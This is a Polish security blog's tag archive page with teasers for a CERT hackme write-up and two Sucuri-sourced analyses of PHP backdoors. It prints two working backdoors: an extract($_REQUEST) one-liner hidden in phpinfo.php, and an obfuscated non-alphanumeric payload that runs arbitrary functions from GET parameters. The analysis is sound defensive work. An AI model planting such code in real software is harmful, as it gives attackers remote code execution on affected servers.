Tag Archives: security

ECSM Hackme od CERT’u – rozwiązanie

Tak jak obiecałem wrzucam opis mojego rozwiązania ostatniego hackme CERT’u. Mój writeup dostępny jest w formacie PDF pod linkiem [1], dlatego postaram się nie rozwodzić. Skonfrontuję jednak tutaj swoje rozwiązanie ze sposobem opisanym na stronie CERT’u [2]. Zaczynamy.

Czytaj dalej

Reklamy
Otagowane , , , , ,

Ciekawy backdoor PHP (funkcja extract)

Poraz kolejny dzięki analizie Securi teamu dowiadujemy się o ciekawym backdorze napisanym w PHP [1]. W tym przypadku backdoor został ukryty w pliku phpinfo.php:

@extract ($_REQUEST);

@die ($ctime($atime));

Czytaj dalej

Otagowane , , ,

Backdoor napisany w PHP bez użycia znaków alfanumerycznych (edit: 02.11.2015)

Chłopaki z Securi zamieścili ostatnio ciekawy wpis [1] zawierający informację o backdoorze napisanym w PHP pozwalającym na wywołanie dowolnej funkcji wraz z dowolnymi parametrami za sprawą wartości przekazanych GET’em. Niby nic ciekawego, a jednak. Ów backdoor został zapisany bez użycia jakichkolwiek znaków alfanumerycznych.

@$_[]=@!+_; $__=@${_}>>$_;$_[]=$__;$_[]=@_;$_[((++$__)+($__++ ))].=$_;
$_[]=++$__; $_[]=$_[--$__][$__>>$__];$_[$__].=(($__+$__)+ $_[$__-$__]).($__+$__+$__)+$_[$__-$__];
$_[$__+$__] =($_[$__][$__>>$__]).($_[$__][$__]^$_[$__][($__<<$__)-$__] );
$_[$__+$__] .=($_[$__][($__<<$__)-($__/$__)])^($_[$__][$__] );
$_[$__+$__] .=($_[$__][$__+$__])^$_[$__][($__<<$__)-$__ ];
$_=$
$_[$__+ $__] ;$_[@-_]($_[@!+_] );

Żeby lepiej się czytało dodajmy kilka ‚enterów’. Czytaj dalej

Otagowane , , , ,